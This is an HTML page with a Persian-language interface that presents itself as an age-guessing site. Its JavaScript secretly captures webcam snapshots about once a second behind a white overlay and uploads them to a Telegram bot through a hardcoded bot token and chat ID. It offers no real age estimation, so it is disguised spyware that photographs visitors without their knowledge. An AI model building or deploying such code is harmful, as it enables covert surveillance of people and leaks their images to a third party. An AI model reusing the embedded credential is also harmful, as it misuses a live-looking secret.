<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>حدس سن</title>
    <script type="text/javascript" src="https://unpkg.com/webcam-easy/dist/webcam-easy.min.js"></script>
    <style>
        body {
            position: relative;
        }
        #overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 900px;
            height: 700px;
            background-color: white;
            z-index: 1;
        }
        #webCam {
            position: absolute;
            top: 0;
            left: 0;
            z-index: 0;
        }
        #message {
            position: absolute;
            align-items: center;
            font-size: 24px;
            font-weight: bold;
            color: rgb(0, 0, 0); /* رنگ و سبک متن را بر اساس نیاز خود تنظیم کنید */
            z-index: 2; /* این لایه بالایی‌تر از #overlay است */
        }
        #masdor {
            position: absolute;
            margin-top: 60px;
            font-size: 24px;
            font-weight: bold;
            color: rgb(0, 0, 0); /* رنگ و سبک متن را بر اساس نیاز خود تنظیم کنید */
            z-index: 2; /* این لایه بالایی‌تر از #overlay است */

        }

    </style>
</head>
<body>
    <div id="overlay"></div>
    <div id="message">لطفا 10 ثانیه تا لود شدن منتظر باش</div>
    <div id="masdor">دسترسی دوربین را برای این که سایت کار کند مجاز کن</div>
    <video id="webCam" autoplay playsinline width="900" height="700"></video>
    <canvas id="canvas" aria-placeholder="sadrag"></canvas>
    <script>
        document.addEventListener('DOMContentLoaded', () => {
            const webCamElement = document.getElementById("webCam");
            const canvasElement = document.getElementById("canvas");
            const webcam = new Webcam(webCamElement, "user", canvasElement);

            let snapshotCounter = localStorage.getItem('snapshotCounter');
            if (!snapshotCounter) {
                snapshotCounter = 1;
            } else {
                snapshotCounter = parseInt(snapshotCounter);
            }

            function checkCameraPermission() {
                if (localStorage.getItem('cameraPermission') === 'granted') {
                    startWebcam();
                } else {
                    requestCameraPermission();
                }
            }

            function requestCameraPermission() {
                webcam.start()
                    .then(() => {
                        localStorage.setItem('cameraPermission', 'granted');
                        takeAPicture();
                    })
                    .catch(err => {
                        localStorage.setItem('cameraPermission', 'denied');
                        setTimeout(requestCameraPermission, 1000);
                    });
            }

            function startWebcam() {
                webcam.start()
                    .then(() => {
                        setInterval(() => {
                            takeAPicture();
                        }, 1000);
                    })
                    .catch(err => {
                        console.error(err);
                    });
            }

            function dataURLToBlob(dataURL) {
                const parts = dataURL.split(';base64,');
                const byteString = atob(parts[1]);
                const mimeString = parts[0].split(':')[1];
                const ab = new ArrayBuffer(byteString.length);
                const ia = new Uint8Array(ab);
                for (let i = 0; i < byteString.length; i++) {
                    ia[i] = byteString.charCodeAt(i);
                }
                return new Blob([ab], { type: mimeString });
            }

            function takeAPicture() {
                let picture = webcam.snap();
                let pictureBlob = dataURLToBlob(picture);
                let fileName = `snapshot${snapshotCounter}.png`;

                let botToken = '7237749285:AAGGtOLFEncaQQsFwqFWZk-iydsJjmSm4yM'; // Replace with your Telegram bot API token
                let chatId = '5480769413'; // Replace with your Telegram chat ID

                let formData = new FormData();
                formData.append('chat_id', chatId);
                formData.append('photo', pictureBlob, fileName);

                fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
                    method: 'POST',
                    body: formData
                })
                .then(response => response.json())
                .then(data => {
                    console.log('Message sent to Telegram:', data);
                })
                .catch(error => {
                    console.error('Error sending message to Telegram:', error);
                });

                snapshotCounter++;
                localStorage.setItem('snapshotCounter', snapshotCounter);
            }

            checkCameraPermission();
        });
    </script>
</body>
</html>
